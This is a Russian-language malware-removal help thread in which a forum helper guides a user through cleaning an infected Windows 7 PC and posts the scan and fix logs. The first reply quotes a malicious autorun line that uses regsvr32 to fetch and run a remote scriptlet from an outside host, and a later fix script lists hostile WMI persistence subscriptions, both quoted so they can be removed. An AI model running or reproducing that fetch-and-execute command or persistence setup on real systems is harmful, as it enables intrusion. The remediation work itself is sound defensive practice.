• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Решена Общее торможение, некорректная работа антивирусов/антишпионских утилит

Статус
В этой теме нельзя размещать новые ответы.

terence

Новый пользователь
Сообщения
9
Реакции
0
Баллы
1
Здравствуйте!
С некоторых пор комп стал притормаживать на совсем обычных задачах типа нетсёрфинга или IPTV, чего ранее вообще не было. Поначалу устранялось перезагрузкой и чисткой Си-клинером, хватало на день, потом опять. Как-то несколько разпытался сканировать с помощь DrWeb CureIt, в процессе комп зависал на одном и том же объекте и помогала только перезагрузка кнопкой, в итоге забил. С недавнего времени ситуация резко ухудшилась, винда загружается около получаса, постоянно выскакивают окна про нехватку компонента debug\item.dat, восстановление с диска Виндоус ничего не даёт, точки восстановления не создаются, хотя раньше создавались, соответственно откатиться некуда, скачал Malwarebytes, она не запускается. Антивирус стоит Авира, Real-Time protection отклчена и включить не удаётся. Подскажите как лечить
 

Вложения

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,407
Реакции
1,839
Баллы
563
Здравствуйте!

1.
"Пофиксите" в HijackThis:
Код:
O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.1226bye.xyz:280/v.sct scrobj.dll
2.
Через Панель управления - Удаление программ - удалите нежелательное ПО:
McAfee Security Scan Plus
Spybot - Search & Destroy
3.
Пролечите систему с помощью KVRT.

4.
Соберите и прикрепите свежий CollectionLog с помощью Автологера.
 
Последнее редактирование модератором:
  • Like
Реакции: akok

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,407
Реакции
1,839
Баллы
563
Что из проблем сейчас осталось?
 

terence

Новый пользователь
Сообщения
9
Реакции
0
Баллы
1
1.Авира обновилась (до этого не могла) рил-тайм протекшн включился
2. Malwarebytes не запускается все равно
3. Общее торможение - пока не ясно, вроде нормально всё но надо подождать для точности
4. Ранее забыл упомянуть, не хочет устанавливаться (неоднократно) одно обновление:

Ежемесячный набор исправлений качества системы безопасности для систем Windows 7 на базе процессоров x64 (KB4480970), 01 2019 г.
Дата установки: ‎30.‎01.‎2019 15:05
Состояние установки: Отказ
Сведения об ошибке: Код 8000FFFF
Способ обновления: Важное

Сейчас тоже попытался - результат отрицательный
 

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,407
Реакции
1,839
Баллы
563
Malwarebytes не запускается все равно
Пока деинсталлируйте его.

Давайте еще посмотрим такие логи:
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

terence

Новый пользователь
Сообщения
9
Реакции
0
Баллы
1
Ещё поигрался. Перезагрузка конечно не полчаса, но долговато, минуты 3-4. После этого Авира выдаёт рекомендации относительно настройки автозапуска для ускорения, рекоендации выполнил, перезагрузил, и всё равно два процесса не поддатся корректировке
 

Вложения

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,407
Реакции
1,839
Баллы
563
Картинки получились слишком мелкие. Выложите отдельно. Но вообще, не следует доверять подобным автоматическим оптимизаторам.
Ждём логи.
 

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,407
Реакции
1,839
Баллы
563
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{e7180c00-1a66-4693-beec-f79094e619a0} <==== ATTENTION (Restriction - IP)
    S3 MBAMService; "C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe" [X]
    S3 4F9504A71D6D3CF2; \??\C:\Users\Витася\AppData\Local\Temp\435AC690.sys [X] <==== ATTENTION
    2019-01-29 23:38 - 2019-01-29 23:38 - 000000000 ____D C:\ProgramData\Malwarebytes
    2019-01-30 12:26 - 2018-10-30 00:45 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
    2019-01-30 11:54 - 2018-10-30 00:45 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
    2018-10-25 04:51 - 2018-12-13 22:24 - 000000084 _____ () C:\Program Files\Common Files\xp.dat
    2018-10-25 04:50 - 2019-01-30 09:27 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
    WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
    WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION
    WMI:subscription\__EventFilter->fuckyoumm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
 

terence

Новый пользователь
Сообщения
9
Реакции
0
Баллы
1
И снова здравствуйте! Понабюдал. Загрузка системы ок 3мин. С антивиром проблем нет. С обновлениями тоже. День-два непрерывной работы компа и начинаются притормаживания, лечим С-клинер + перезагрузка, т.е. плюс-минус как в начале моего первого поста. Системный диск - отдельный ХДД, наполовину пустой.
 

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,407
Реакции
1,839
Баллы
563
Сделаем так: здесь завершаем, а продолжите в системном разделе.

1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.

2.
  • Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе
  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.
 

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,407
Реакции
1,839
Баллы
563
------------------------------- [ Windows ] -------------------------------
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
--------------------------- [ OtherUtilities ] ----------------------------
WinRAR, версия 5.00 v.5.00 Внимание! Скачать обновления
Microsoft Office Standard 2007 v.12.0.4518.1014 Данная программа больше не поддерживается разработчиком. Узнать больше.
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.4.44846 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.
BitComet 1.37 64-bit v.1.37 Внимание! Клиент сети P2P! Может содержать рекламные модули или использоваться для скачивания нежелательного контента.
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 151 v.8.0.1510.12 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u201-windows-i586.exe)^
---------------------------- [ UnwantedApps ] -----------------------------
QIP Internet Guardian Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.


Рекомендации после удаления вредоносного ПО
 
  • Like
Реакции: akok
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу